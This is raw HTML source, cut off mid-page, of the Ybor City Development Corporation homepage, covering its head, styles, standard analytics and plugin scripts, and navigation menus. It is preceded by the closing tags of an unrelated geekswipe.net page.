src='https://geekswipe.net/wp-includes/js/wp-embed.min.js?ver=5.2'></script> <script type='text/javascript'> /* <![CDATA[ */ var mc4wp_forms_config = []; /* ]]> */ </script> <script type='text/javascript' src='https://geekswipe.net/wp-content/plugins/mailchimp-for-wp/assets/js/forms-api.min.js?ver=4.5.2'></script> <!--[if lte IE 9]> <script type='text/javascript' src='https://geekswipe.net/wp-content/plugins/mailchimp-for-wp/assets/js/third-party/placeholders.min.js?ver=4.5.2'></script> <![endif]--> <!--[if lt IE 9]> <script src="https://geekswipe.net/wp-content/themes/cynosure/js/ie/respond.js"></script> <![endif]--> </body> </html> <!-- Dynamic page generated in 0.120 seconds. --> <!-- Cached page generated by WP-Super-Cache on 2019-05-16 21:33:10 --> <!-- super cache -->
0
<!DOCTYPE html><html lang=en-US prefix="og: http://ogp.me/ns#" ><head><meta name=msvalidate.01 content=7406E2DAE0CAE4D8CBC59F3A53D1B2AE><meta charset=UTF-8><meta name=viewport content="width=device-width, initial-scale=1, maximum-scale=1"><meta name=format-detection content="telephone=no"><link rel=profile href=http://gmpg.org/xfn/11><link rel=pingback href=https://yborcityonline.com/xmlrpc.php><title>Ybor City Online | News, Events, Things to Do and More</title><meta name=description content="Tour Ybor City&#039;s merchant, restaurant and store directory. Find parking, live, work, do business in Tampa Bay&#039;s National Historic Landmark District. YCDC"> <script type=application/ld+json>{"@context":"http://schema.org","@type":"WebSite","name":"Ybor City Development Corporation | Ybor City Online","url":"https://yborcityonline.com/"}</script> <link rel=canonical href=https://yborcityonline.com/><meta property=og:title content="Ybor City"><meta property=og:type content=website><meta property=og:url content=https://yborcityonline.com/><meta property=og:image content=https://yborcityonline.com/wp-content/plugins/all-in-one-seo-pack/images/default-user-image.png><meta property=og:site_name content="Ybor City"><meta name=twitter:card content=summary><meta name=twitter:title content="Ybor City"><meta name=twitter:image content=https://yborcityonline.com/wp-content/plugins/all-in-one-seo-pack/images/default-user-image.png><meta itemprop=image content=https://yborcityonline.com/wp-content/plugins/all-in-one-seo-pack/images/default-user-image.png> <script >window.ga=window.ga||function(){(ga.q=ga.q||[]).push(arguments)};ga.l=+new Date;ga('create','UA-23604950-1','auto');ga('send','pageview');</script> <script async src=https://www.google-analytics.com/analytics.js></script> <link rel=dns-prefetch href=//fonts.googleapis.com><link rel=dns-prefetch href=//s.w.org><link rel=alternate type=application/rss+xml title="Ybor City &raquo; Feed" href=https://yborcityonline.com/feed/><link rel=alternate type=application/rss+xml title="Ybor City &raquo; Comments Feed" href=https://yborcityonline.com/comments/feed/><link rel=alternate type=text/calendar title="Ybor City &raquo; iCal Feed" href="https://yborcityonline.com/events/?ical=1"> <script>window._wpemojiSettings={"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/yborcityonline.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.0.4"}};!function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings);</script> <style>img.wp-smiley,img.emoji{display:inline !important;border:none !important;box-shadow:none !important;height:1em !important;width:1em !important;margin:0 .07em !important;vertical-align:-0.1em !important;background:none !important;padding:0 !important}</style><link rel=stylesheet href=https://cdn.yborcityonline.com/wp-content/cache/minify/c221b.css media=all><link rel=stylesheet id=tp-open-sans-css href='https://fonts.googleapis.com/css?family=Open+Sans%3A300%2C400%2C600%2C700%2C800&#038;ver=5.0.4' type=text/css media=all><link rel=stylesheet id=tp-raleway-css href='https://fonts.googleapis.com/css?family=Raleway%3A100%2C200%2C300%2C400%2C500%2C600%2C700%2C800%2C900&#038;ver=5.0.4' type=text/css media=all><link rel=stylesheet id=tp-droid-serif-css href='https://fonts.googleapis.com/css?family=Droid+Serif%3A400%2C700&#038;ver=5.0.4' type=text/css media=all><link rel=stylesheet id=tp-trajan-css href='https://fonts.googleapis.com/css?family=trajan&#038;ver=5.0.4' type=text/css media=all><link rel=stylesheet href=https://cdn.yborcityonline.com/wp-content/cache/minify/73571.css media=all><style id=rs-plugin-settings-inline-css>#rs-demo-id{}</style><link rel=stylesheet href=https://cdn.yborcityonline.com/wp-content/cache/minify/44b01.css media=all><link rel=stylesheet id=citygov-font-google_fonts-style-css href='https://fonts.googleapis.com/css?family=Arimo:300,300italic,400,400italic,700,700italic|Open+Sans:300,300italic,400,400italic,700,700italic|Hind:400,500|Montserrat:300,300italic,400,400italic,700,700italic|Damion&#038;subset=latin,latin-ext' type=text/css media=all><link rel=stylesheet href=https://cdn.yborcityonline.com/wp-content/cache/minify/f5684.css media=all><style id=citygov-custom-style-inline-css>.menu_side_nav>li ul,.menu_main_nav>li ul{width:250px}.menu_side_nav>li>ul ul,.menu_main_nav>li>ul ul{left:254px}.menu_side_nav>li>ul ul.submenu_left,.menu_main_nav>li>ul ul.submenu_left{left:-251px}.contacts_wrap .logo img{height:30px}div.logo::after{display:none}.scheme_original .slider_col{background-color:#063259}.rev_slider_wrapper fullwidthbanner-container{display:none}.top_panel_middle{background-color:#efecdf;padding-top:10px}.scheme_original .top_panel_inner_style_3 .search_field{color:#fff}.top_panel_inner_style_3 .search_field,.top_panel_inner_style_3 .search_wrap .search_submit,.top_panel_inner_style_3 .search_wrap .search_submit:hover{background-color:#fff !important;border:none}.top_panel_top .search_field{float:right;padding-top:10px;padding-bottom:10px;padding-left:30px;max-width:16em;border-radius:5px}.top_panel_top_contact_area{display:none}.top_panel_top{background-color:#063259}.sc_section_inner{opacity:0em}.scheme_original .top_panel_middle{background-color:#efecdf}.scheme_original .copyright_wrap_inner{background-color:#303030}.sc_socials_share_item{background-color:#063259}.scheme_original footer .footer_wrap_inner{background-color:#063259}.page_content_wrap{padding:0em}.footer_wrap widget_area scheme_original{background-color:#063259}.scheme_original body .post_type_donation .sc_socials_share_item,.scheme_original .sc_socials.sc_socials_type_icons a{background-color:#063259}.scheme_original .top_panel_inner_style_3 .top_panel_top,.scheme_original .top_panel_inner_style_4 .top_panel_top,.scheme_original .top_panel_inner_style_5 .top_panel_top,.scheme_original .top_panel_inner_style_3 .top_panel_top .sidebar_cart,.scheme_original .top_panel_inner_style_4 .top_panel_top .sidebar_cart{background-color:#063259}.top_panel_top_socials{float:left;margin-top:1.8em;margin-right:15em}@media (max-width:4000px) and (min-width:1800px){.sidebar_right .sidebar{padding-top:150px}.top_text_alert_long{z-index:5000;position:relative;top:58px;color:white;margin-top:-26px;left:63%;width:165px}.top_text_alert_icon{display:none}.top_text_alert_long_cell{display:none}}@media (max-width:1800px) and (min-width:1663px){.top_text_alert_long{z-index:5000;position:relative;top:58px;color:white;margin-top:-30px;left:65%;width:165px}.top_text_alert_icon{display:none}}@media (max-width:1662px) and (min-width:1440px){.top_text_alert_long{z-index:5000;position:relative;top:58px;color:white;margin-top:-30px;left:68%;width:150px}.top_text_alert_icon{display:none}}@media (max-width:1439px) and (min-width:1280px){.top_text_alert_long{z-index:5000;position:relative;top:58px;color:white;margin-top:-30px;left:66%;width:135px}.top_text_alert_icon{display:none}}@media (max-width:1279px) and (min-width:1262px){.top_text_alert_long{z-index:5000;position:relative;top:50px;color:white;margin-top:-30px;left:71%;width:140px}.top_text_alert_icon{display:none}}@media (max-width:2000px) and (min-width:1262px){.menu_main_nav{font-size:1.15em;text-align:center}.top_text_alert_long_cell{display:none}.top_panel_wrap .logo_main{max-height:150px;width:auto}.top_panel_middle .menu_main_nav_area{padding-top:35px}.sidebar_right .sidebar{padding-top:150px}.top_text_alert_small{display:none}}@media (min-width:1136px) and (max-width:1262px){.menu_main_nav{font-size:2.2em;padding-right:2500px}.top_text_alert_long_cell{display:none}.top_text_alert_long{display:none}.top_text_alert_icon{z-index:5000;position:relative;top:50px;color:white;margin-top:-30px;left:71%;width:50px}.sidebar_right .sidebar{padding-top:150px}.top_panel_wrap .logo_main{max-height:400px;width:auto;margin-left:20%;padding-left:50%}}@media (min-width:1024px) and (max-width:1135px){.top_panel_top_socials{margin-top:2em;margin-right:15em}.top_text_alert_long_cell{display:none}.top_text_alert_long{display:none}.top_panel_wrap .logo_main{max-height:150px;width:auto}.menu_main_nav{font-size:1.1em;text-align:center}.top_panel_middle .menu_main_nav_area{margin-top:35px}footer .logo_descr{line-height:1.5;font-size:16px}.sidebar_right .sidebar{padding-top:150px}.top_text_alert_icon{z-index:5000;position:relative;top:50px;color:white;margin-top:-30px;left:77%;width:50px}}@media (min-width:960px) and (max-width:1023px){.menu_main_nav_area{font-size:.95em;padding-top:75px}.sidebar_right .sidebar{padding-top:150px}.top_text_alert_long{display:none}.top_text_alert_icon{z-index:5000;position:relative;top:50px;color:white;margin-top:-30px;left:77%;width:50px}}@media (min-width:768px) and (max-width:959px){.top_panel_top_socials{margin-top:2em;margin-right:15em}.top_text_alert_long{display:none}.top_panel_top_search{float:right;margin-top:1.85em}.menu_main_nav{font-size:1.25em;margin-right:300px}.top_panel_wrap .logo_main{max-height:200px;width:auto}footer .logo_descr{text-align:center;line-height:1.5;font-size:16px}.sidebar_right .sidebar{padding-top:25px}}@media (min-width:959px) and (max-width:1023px){.top_text_alert_long_cell{display:none}.top_panel_top_socials{margin-top:2em;margin-right:15em}.top_text_alert_long{display:none}.top_panel_top_search{float:right;margin-top:1.85em}.sidebar_right .sidebar{padding-top:25px}.menu_main_nav{font-size:1em;margin-right:300px}.top_panel_wrap .logo_main{max-height:200px;width:auto}footer .logo_descr{text-align:center;line-height:1.5;font-size:16px}}@media (min-width:859px) and (max-width:959px){.top_text_alert_icon{z-index:5000;position:relative;top:50px;color:white;margin-top:-30px;left:76%;width:46px}.top_text_alert_long_cell{display:none}}@media (min-width:768px) and (max-width:859px){.top_text_alert_icon{z-index:5000;position:relative;top:50px;color:white;margin-top:-30px;left:79%;width:50px}.top_text_alert_long_cell{display:none}}@media (min-width:480px) and (max-width:767px){.responsive_menu .top_panel_middle .menu_main_responsive_button{top:5.45em}.top_text_alert_long_cell{display:none}.top_page_title{display:none}.top_panel_top_socials{display:none}.top_panel_middle .logo img{max-height:500px}.sidebar_right .sidebar{padding-top:25px}.top_panel_style_1 .top_panel_top_socials,.top_panel_style_1 .top_panel_top_open_hours,.top_panel_style_2 .top_panel_top_socials,.top_panel_style_2 .top_panel_top_open_hours,.top_panel_style_3 .top_panel_top_socials{margin-top:2.2em}.responsive_menu .top_panel_middle .menu_main_responsive_button{top:4em}.top_panel_wrap .logo_main{max-height:150px;width:auto}footer .logo_descr{line-height:1.5;font-size:16px}.vc_empty_space{display:none}.top_text_alert_long{z-index:5000;position:relative;top:50px;color:white;margin-top:-30px;left:45%;width:200px}.top_text_alert_icon{display:none}}@media (min-width:480px) and (max-width:639px){.page_content_wrap{margin-top:5em}footer .logo_descr{text-align:center;line-height:1.5;font-size:16px}.vc_empty_space{display:none}.sidebar_right .sidebar{padding-top:25px}.top_text_alert_long{z-index:5000;position:relative;top:50px;color:white;margin-top:-30px;left:35%;width:160px}}@media (max-width:479px){.sc_socials.sc_socials_size_medium{margin-right:1.625em}.top_text_alert_long_cell{}.top_page_title{display:none}.top_text_alert_long{z-index:5000;position:relative;display:block;top:0px;color:white;margin-top:-30px;left:45%}.top_panel_top_socials{display:none}.top_text_alert_icon{display:none}.sidebar_right .sidebar{padding-top:25px}footer .logo_descr{text-align:center;line-height:1.5;font-size:16px}.widget_area .widget_socials .sc_socials{margin-top:3em;margin-left:6.5em}.vc_empty_space{display:none}.top_panel_top_search{display:none}}@media (max-width:767px){div.vc_row.wpb_row.vc_row-fluid.slider_col.vc_custom_1479849891181{display:none}div.vc_row.wpb_row.vc_row-fluid.slider_col.vc_custom_1479760775433{display:none}div.vc_row.wpb_row.vc_row-fluid.slider_col.vc_custom_1479761102281{display:none}div.vc_row.wpb_row.vc_row-fluid.slider_col.vc_custom_1479761224223{display:none}div.vc_row.wpb_row.vc_row-fluid.slider_col.vc_custom_1479761452336{display:none}}.scheme_original .content .rev_slider_wrapper .slotholder:after{display:none}.scheme_original .content .rev_slider_wrapper .slotholder:before{display:none}div.post_content.isotope_item_content:before{display:none}a.hover_icon.hover_icon_link:before{display:none}@media (min-width:768px){.vc_tta-color-grey.vc_tta-style-classic.vc_tta-tabs .vc_tta-panels{background-color:#f3f3f3;opacity:.95}}.scheme_original .widget_area_inner .post_title a{color:#f8f8f8}.scheme_original .widget_area_inner .widget_text a:not(.sc_button),.scheme_original .widget_area_inner .post_info a{color:#c2c2c2}.scheme_original .widget_area_inner a,.scheme_original .widget_area_inner ul li a:hover,.scheme_original .widget_area_inner button:before{color:#f8f8f8}.tribe-events-calendar th{color:#fff}a.tribe-events-ical tribe-events-button sc_button sc_button_style_filled{display:none}.scheme_original .post_item_departments,.scheme_original .post_item_masonry,.scheme_original .post_item_masonew,.scheme_original .post_item_masonews{margin-top:2em}.widget_area_inner ul li a:hover{color:#91231e!important}.sidebar_inner aside{margin-bottom:2em}.scheme_original .menu_main_nav{background-color:transparent}footer .logo_descr{line-height:1.5;margin-left:-12.5px}.copyright-right{float:right!important}p.wpgmza_infowindow_address{display:none!important}.tribe-events-notices{display:none}div.tribe-events-schedule tribe-clearfixdisplay:none}</style><link rel=stylesheet href=https://cdn.yborcityonline.com/wp-content/cache/minify/39b33.css media=all> <script src=https://cdn.yborcityonline.com/wp-content/cache/minify/a3e62.js></script> <script>var GDPR={"ajaxurl":"https:\/\/yborcityonline.com\/wp-admin\/admin-ajax.php","logouturl":"","i18n":{"aborting":"Aborting","logging_out":"You are being logged out.","continue":"Continue","cancel":"Cancel","ok":"OK","close_account":"Close your account?","close_account_warning":"Your account will be closed and all data will be permanently deleted and cannot be recovered. Are you sure?","are_you_sure":"Are you sure?","policy_disagree":"By disagreeing you will no longer have access to our site and will be logged out."},"is_user_logged_in":"","refresh":"1"};</script> <script src=https://cdn.yborcityonline.com/wp-content/cache/minify/182f0.js></script> <script>var wpgmza_google_api_status={"message":"Enqueued","code":"ENQUEUED"};</script> <script src=https://cdn.yborcityonline.com/wp-content/cache/minify/264b5.js></script> <link rel=https://api.w.org/ href=https://yborcityonline.com/wp-json/><link rel=EditURI type=application/rsd+xml title=RSD href=https://yborcityonline.com/xmlrpc.php?rsd><link rel=wlwmanifest type=application/wlwmanifest+xml href=https://yborcityonline.com/wp-includes/wlwmanifest.xml><meta name=generator content="WordPress 5.0.4"><link rel=shortlink href=https://yborcityonline.com/><link rel=alternate type=application/json+oembed href="https://yborcityonline.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fyborcityonline.com%2F"><link rel=alternate type=text/xml+oembed href="https://yborcityonline.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fyborcityonline.com%2F&#038;format=xml"> <script>(function(h,e,a,t,m,p){m=e.createElement(a);m.async=!0;m.src=t;p=e.getElementsByTagName(a)[0];p.parentNode.insertBefore(m,p);})(window,document,'script','https://u.heatmap.it/log.js');</script> <script>var ajaxRevslider;jQuery(document).ready(function(){ajaxRevslider=function(obj){var content="";data={};data.action='revslider_ajax_call_front';data.client_action='get_slider_html';data.token='4a47b64751';data.type=obj.type;data.id=obj.id;data.aspectratio=obj.aspectratio;jQuery.ajax({type:"post",url:"https://yborcityonline.com/wp-admin/admin-ajax.php",dataType:'json',data:data,async:false,success:function(ret,textStatus,XMLHttpRequest){if(ret.success==true) content=ret.data;},error:function(e){console.log(e);}});return content;};var ajaxRemoveRevslider=function(obj){return jQuery(obj.selector+" .rev_slider").revkill();};var extendessential=setInterval(function(){if(jQuery.fn.tpessential!=undefined){clearInterval(extendessential);if(typeof(jQuery.fn.tpessential.defaults)!=='undefined'){jQuery.fn.tpessential.defaults.ajaxTypes.push({type:"revslider",func:ajaxRevslider,killfunc:ajaxRemoveRevslider,openAnimationSpeed:0.3});}}},30);});</script> <script type=application/ld+json>{"@context":"http:\/\/schema.org","@type":"Organization","@id":"#organization","name":"Ybor City Development Corporation","url":"https:\/\/yborcityonline.com","logo":"https:\/\/yborcityonline.com\/wp-content\/uploads\/2016\/10\/YCDC-Logo-FINAL-Copy-1.png","contactPoint":{"@type":"ContactPoint","telephone":"+18132747936","url":"","contactType":"customer support"},"sameAs":["https:\/\/www.facebook.com\/YborCityTampa","https:\/\/twitter.com\/historicybor","https:\/\/www.instagram.com\/moreinybor\/","https:\/\/www.youtube.com\/user\/yborcitydev","https:\/\/www.linkedin.com\/in\/historicybor"]}</script> <script type=application/ld+json>{"@context":"http://schema.org","@type":"WebSite","@id":"#website","url":"https://yborcityonline.com/","potentialAction":{"@type":"SearchAction","target":"https://yborcityonline.com/?s={search_term_string}","query-input":"required name=search_term_string"}}</script> <script>(function(url){if(/(?:Chrome\/26\.0\.1410\.63 Safari\/537\.31|WordfenceTestMonBot)/.test(navigator.userAgent)){return;} var addEvent=function(evt,handler){if(window.addEventListener){document.addEventListener(evt,handler,false);}else if(window.attachEvent){document.attachEvent('on'+evt,handler);}};var removeEvent=function(evt,handler){if(window.removeEventListener){document.removeEventListener(evt,handler,false);}else if(window.detachEvent){document.detachEvent('on'+evt,handler);}};var evts='contextmenu dblclick drag dragend dragenter dragleave dragover dragstart drop keydown keypress keyup mousedown mousemove mouseout mouseover mouseup mousewheel scroll'.split(' ');var logHuman=function(){if(window.wfLogHumanRan){return;} window.wfLogHumanRan=true;var wfscr=document.createElement('script');wfscr.type='text/javascript';wfscr.async=true;wfscr.src=url+'&r='+Math.random();(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(wfscr);for(var i=0;i<evts.length;i++){removeEvent(evts[i],logHuman);}};for(var i=0;i<evts.length;i++){addEvent(evts[i],logHuman);}})('//yborcityonline.com/?wordfence_lh=1&hid=6D65E0BFF7B298ECB45242A27A85CA83');</script><meta name=tec-api-version content=v1><meta name=tec-api-origin content=https://yborcityonline.com><link rel=https://theeventscalendar.com/ href=https://yborcityonline.com/wp-json/tribe/events/v1/><script src="//yborcityonline.com/?wordfence_syncAttackData=1558018690.2341" async></script><meta name=generator content="Powered by Visual Composer - drag and drop page builder for WordPress."> <!--[if lte IE 9]><link rel=stylesheet type=text/css href=https://yborcityonline.com/wp-content/plugins/js_composer/assets/css/vc_lte_ie9.min.css media=screen><![endif]--><meta name=generator content="Powered by Slider Revolution 5.2.6 - responsive, Mobile-Friendly Slider Plugin for WordPress with comfortable drag and drop interface."><link rel=icon href=https://yborcityonline.com/wp-content/uploads/2016/10/cropped-YCDC-Logo-Copy-32x32.png sizes=32x32><link rel=icon href=https://yborcityonline.com/wp-content/uploads/2016/10/cropped-YCDC-Logo-Copy-192x192.png sizes=192x192><link rel=apple-touch-icon-precomposed href=https://yborcityonline.com/wp-content/uploads/2016/10/cropped-YCDC-Logo-Copy-180x180.png><meta name=msapplication-TileImage content=https://yborcityonline.com/wp-content/uploads/2016/10/cropped-YCDC-Logo-Copy-270x270.png><style data-type=vc_custom-css>.home_infopanel{background-color:#063259}.scheme_original .slider_col{background-color:#063259}.sc_section aligncenter{background-color:black}.post_info_author{display:none}.post_info_counters{display:none}.post_info_posted_by{display:none}.welcome_box_hidden{display:none}@media{footer{margin-top:-60px}}</style><style data-type=vc_shortcodes-custom-css>.vc_custom_1480689245802{background-color:#efecdf !important}.vc_custom_1479849891181{padding:25px !important}.vc_custom_1477503115811{background-color:#efecdf !important}.vc_custom_1477516722486{background-color:#efecdf !important}.vc_custom_1479227090730{padding-top:10px !important;padding-bottom:10px !important;background-color:#063259 !important}.vc_custom_1477516749921{background-color:#fff !important}</style><noscript><style>.wpb_animate_when_almost_visible{opacity:1}</style></noscript> <script>(function(h,e,a,t,m,p){m=e.createElement(a);m.async=!0;m.src=t;p=e.getElementsByTagName(a)[0];p.parentNode.insertBefore(m,p);})(window,document,'script','https://u.heatmap.it/log.js');</script> <script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-WVTH4SZ');</script> </head><body class="home page-template-default page page-id-5 tribe-no-js citygov_body body_style_wide body_filled theme_skin_citygov article_style_stretch layout_single-standard template_single-standard scheme_original top_panel_show top_panel_above sidebar_hide sidebar_outer_hide wpb-js-composer js-comp-ver-5.0 vc_responsive"><noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-WVTH4SZ" height=0 width=0 style=display:none;visibility:hidden></iframe></noscript> <a id=toc_home class=sc_anchor title=Home data-description="&lt;i&gt;Return to Home&lt;/i&gt; - &lt;br&gt;navigate to home page of the site" data-icon=icon-home data-url=https://yborcityonline.com/ data-separator=yes></a><a id=toc_top class=sc_anchor title="To Top" data-description="&lt;i&gt;Back to top&lt;/i&gt; - &lt;br&gt;scroll to top of the page" data-icon=icon-double-up data-url data-separator=yes></a><div class=body_wrap><div class=page_wrap><div class=top_page_title style=" left: 20%; z-index: 5000;position: relative; top: 55px; color: white; width: 400px; margin-top:-30px;">Tampa Bay's National Historic Landmark District</div><div class=top_text_alert_long><a href=http://www.tampagov.net/emergency-management/alert-tampa target=_blank><img src=https://cdn.yborcityonline.com/wp-content/uploads/2016/11/YCDC-Text-Alert-Icon-004.png></img></a></div><div class=top_text_alert_icon><a href=http://www.tampagov.net/emergency-management/alert-tampa target=_blank><img src=https://cdn.yborcityonline.com/wp-content/uploads/2016/11/YCDC-Text-Alert-Icon.png></img></a></div><div class=top_panel_fixed_wrap></div><header class="top_panel_wrap top_panel_style_3 scheme_original"><div class="top_panel_wrap_inner top_panel_inner_style_3 top_panel_position_above"><div class=top_panel_top><div class="content_wrap clearfix"><div class=top_panel_top_user_area><div class=top_panel_top_socials><div class="sc_socials sc_socials_type_icons sc_socials_shape_square sc_socials_size_medium"><div class=sc_socials_item><a href=https://twitter.com/historicybor target=_blank class="social_icons social_twitter"><span class=icon-twitter></span></a></div><div class=sc_socials_item><a href=https://www.instagram.com/moreinybor/ target=_blank class="social_icons social_instagramm"><span class=icon-instagramm></span></a></div><div class=sc_socials_item><a href=https://www.linkedin.com/company/ybor-city-development-city/ target=_blank class="social_icons social_linkedin"><span class=icon-linkedin></span></a></div><div class=sc_socials_item><a href=https://www.facebook.com/YborCityTampa target=_blank class="social_icons social_facebook"><span class=icon-facebook></span></a></div><div class=sc_socials_item><a href=https://www.youtube.com/user/yborcitydev target=_blank class="social_icons social_youtube"><span class=icon-youtube></span></a></div></div></div><div class=top_text_alert_long_cell><a href=http://www.tampagov.net/emergency-management/alert-tampa target=_blank><img src=https://cdn.yborcityonline.com/wp-content/uploads/2016/11/YCDC-Text-Alert-Icon-004.png></img></a></div><div class=top_panel_top_search><div class="search_wrap search_style_regular search_state_fixed search_ajax"><div class=search_form_wrap><form role=search method=get class=search_form action=https://yborcityonline.com/> <button type=submit class="search_submit icon-search" title="Start search"></button> <input type=text class=search_field placeholder value name=s></form></div><div class="search_results widget_area scheme_original"><a class="search_results_close icon-cancel"></a><div class=search_results_content></div></div></div></div><ul id=menu_user class=menu_user_nav></ul></div></div></div><div class=top_panel_middle ><div class=content_wrap><div class=contact_logo><div class=logo> <a href=https://yborcityonline.com/><img src=https://cdn.yborcityonline.com/wp-content/uploads/2016/10/YCDC-Logo-small.png class=logo_main alt><img src=https://cdn.yborcityonline.com/wp-content/uploads/2016/10/YCDC-Logo-small.png class=logo_fixed alt></a></div></div><div class=menu_main_wrap> <a href=# class="menu_main_responsive_button icon-menu"></a><nav class=menu_main_nav_area><ul id=menu_main class=menu_main_nav><li id=menu-item-1223 class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-1223"><a href=https://yborcityonline.com/about/>About</a><ul class=sub-menu><li id=menu-item-7999 class="menu-item menu-item-type-post_type menu-item-object-page menu-item-7999"><a href=https://yborcityonline.com/ybor-vision-2020/>Ybor Vision 2020</a></li><li id=menu-item-1984 class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1984"><a href=https://yborcityonline.com/about/map-of-ybor/>Map of Ybor</a></li><li id=menu-item-6059 class="menu-item menu-item-type-post_type menu-item-object-page menu-item-6059"><a href=https://yborcityonline.com/paver-program/>Paver Program</a></li><li id=menu-item-1983 class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1983"><a href=https://yborcityonline.com/about/merchant-directory/>Merchant Directory</a></li><li id=menu-item-1980 class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1980"><a href=https://yborcityonline.com/about/yes-team/>YES Team</a></li><li id=menu-item-1981 class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1981"><a href=https://yborcityonline.com/about/meet-the-ycdc-board-management-team/>YCDC Team</a></li><li id=menu-item-1982 class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1982"><a href=https://yborcityonline.com/about/newsletter-archives/>Newsletter Archives</a></li><li id=menu-item-1979 class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1979"><a href=https://yborcityonline.com/about/calendar-of-events-community-activities/>Calendar of Events</a></li><li id=menu-item-3675 class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3675"><a href=https://yborcityonline.com/about/community-news/>Community News</a></li><li id=menu-item-4999 class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4999"><a href=https://yborcityonline.com/faces-of-ybor/>Faces of Ybor</a></li><li id=menu-item-4453 class="menu-item menu-item-type-custom menu-item-object-custom menu-item-4453"><a href=https://yborcityonline.com/Survey2018>Resident/Worker Study</a></li></ul></li><li id=menu-item-1002 class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-1002"><a href=https://yborcityonline.com/explore/>Explore</a><ul class=sub-menu><li id=menu-item-1989 class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1989"><a href=https://yborcityonline.com/explore/arts-culture/>Arts &#038; Culture</a></li><li id=menu-item-1996 class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1996"><a href=https://yborcityonline.com/explore/ybor-city-ambassadors/>Ambassadors</a></li><li id=menu-item-1990 class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1990"><a href=https://yborcityonline.com/explore/events-festivals/>Events</a></li><li id=menu-item-1988 class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1988"><a href=https://yborcityonline.com/explore/accommodations/>Accommodations</a></li><li id=menu-item-1991 class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1991"><a href=https://yborcityonline.com/explore/food-dining/>Food &#038; Dining</a></li><li id=menu-item-1994 class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1994"><a href=https://yborcityonline.com/explore/tours/>Tours</a></li><li id=menu-item-2773 class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2773"><a href=https://yborcityonline.com/explore/retail/>Shopping</a></li><li id=menu-item-2772 class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2772"><a href=https://yborcityonline.com/explore/museums/>Museums</a></li><li id=menu-item-1995 class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1995"><a href=https://yborcityonline.com/explore/ybor-cigars/>Cigars</a></li><li id=menu-item-2774 class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2774"><a href=https://yborcityonline.com/explore/visitors-center/>Visitors Center</a></li><li id=menu-item-1992 class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1992"><a href=https://yborcityonline.com/explore/about-ybors-architecture/>Event Venues</a></li><li id=menu-item-1993 class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1993"><a href=https://yborcityonline.com/explore/history-of-the-chicken-in-ybor/>Chickens</a></li></ul></li><li id=menu-item-1001 class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-1001"><a href=https://yborcityonline.com/live/>Live</a><ul class=sub-menu><li id=menu-item-1998 class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1998"><a href=https://yborcityonline.com/live/resident-resources/>Resident Resources</a></li><li id=menu-item-1997 class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1997"><a 